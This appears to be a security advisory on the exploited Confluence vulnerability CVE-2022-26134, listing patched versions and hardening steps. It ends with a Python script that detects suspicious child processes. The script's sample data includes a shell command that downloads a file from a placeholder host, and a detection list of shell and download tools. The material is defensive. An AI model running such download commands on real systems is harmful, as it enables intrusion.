About the vulnerability: Attackers have extensively exploited this zero-day issue, primarily targeting internet-exposed servers. Cybersecurity specialists have identified this 0-day vulnerability as "CVE-2022-26134." All of the vendor's supported Confluence Server and Data Center versions are vulnerable to it.
• According to the study, the servers that have not been patched are affected. As of yet, cybersecurity specialists have been unable to determine the earliest version that was compromised.
• It has also been included in the CISA's "Known Exploited Vulnerabilities Catalog" in acknowledgment of its disclosure as an actively exploited vulnerability.
• "The attacker executed a single exploit attempt against each of the Confluence Server systems, which in turn loaded a malicious class file into memory." This effectively gave the attacker a web shell with which to engage via subsequent queries. The advantage of such an attack was that the attacker did not have to constantly re-exploit the server and could execute commands without publishing a backdoor file to disc." Researchers stated.
• While the CISA strongly advises agencies on the government's network to restrict all internet connections to Confluence-related servers. Affected and patched versions
• The company has provided several updates, and all customers are recommended to upgrade their installations to avoid future difficulties. There is a serious risk that this vulnerability affects all current versions of the product on the market.
• What about the patched versions, though? There is no need to be concerned, because we have listed all of the versions that contain the patch for you below:
7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Recommendation
• Check that all internet-facing access to the Confluence server and data center has been disabled.
• When monitoring your Internet-facing web services, make sure you have log retention policies in place as well as robust monitoring capabilities.
• Send log files from each web server that has Internet connectivity to a SIEM or Syslog server.
• Keep a lookout for suspicious child processes of web-application processes.
• Restrict access to the server from the internet with an IP allow list.
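Because the web shell described above lives in memory and writes no backdoor file to disk, the child-process check in the recommendations is one of the few host-side signals left. The following is an added example (not part of the original advisory) that walks a constructed ps-style process snapshot, locates the Confluence JVM and reports shells or download tools spawned anywhere beneath it; the process names, install path and the `SUSPICIOUS_COMMANDS` set are assumptions for illustration.

```python
# Added example, not from the advisory; process names and paths are assumptions for illustration.
from collections import defaultdict

# Commands a Java web application should not normally spawn.
SUSPICIOUS_COMMANDS = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "python3", "perl"}

# Constructed ps-style snapshot (columns: PID PPID USER COMM ARGS). pid 1200 is the
# Confluence JVM; it spawned sh (1340), which ran curl (1341). bash under sshd is benign.
SAMPLE_PS_OUTPUT = """\
PID PPID USER COMM ARGS
1200 1 confluence java /opt/atlassian/confluence/jre/bin/java -Dcatalina.home=/opt/atlassian/confluence
1340 1200 confluence sh sh -c curl http://placeholder.invalid/x -o /tmp/x
1341 1340 confluence curl curl http://placeholder.invalid/x -o /tmp/x
2200 1 root sshd /usr/sbin/sshd -D
2210 2200 root bash -bash
"""

def parse_ps(text):
    """Parse the snapshot into {pid: {ppid, user, comm, args}}; the header line is skipped."""
    procs = {}
    for line in text.strip().splitlines()[1:]:
        pid, ppid, user, comm, args = line.split(None, 4)
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "comm": comm, "args": args}
    return procs

def is_web_app(proc):
    """Heuristic: a java process whose command line references the Confluence install path."""
    return proc["comm"] == "java" and "confluence" in proc["args"].lower()

def find_suspicious_children(procs):
    """Return sorted (pid, comm, args, jvm_pid) for every suspicious descendant of a web-app process."""
    children = defaultdict(list)
    for pid, proc in procs.items():
        children[proc["ppid"]].append(pid)
    findings = []
    for jvm_pid, jvm in procs.items():
        if not is_web_app(jvm):
            continue
        stack = list(children[jvm_pid])  # walk the whole subtree, not only direct children
        while stack:
            pid = stack.pop()
            if procs[pid]["comm"] in SUSPICIOUS_COMMANDS:
                findings.append((pid, procs[pid]["comm"], procs[pid]["args"], jvm_pid))
            stack.extend(children[pid])
    return sorted(findings)

if __name__ == "__main__":
    for pid, comm, args, jvm in find_suspicious_children(parse_ps(SAMPLE_PS_OUTPUT)):
        print(f"[ALERT] pid {pid} ({comm}) under Confluence JVM {jvm}: {args}")
```

The interactive bash under sshd is deliberately left unflagged: the rule fires only inside the web application's process tree, which keeps administrator shells out of the alert stream.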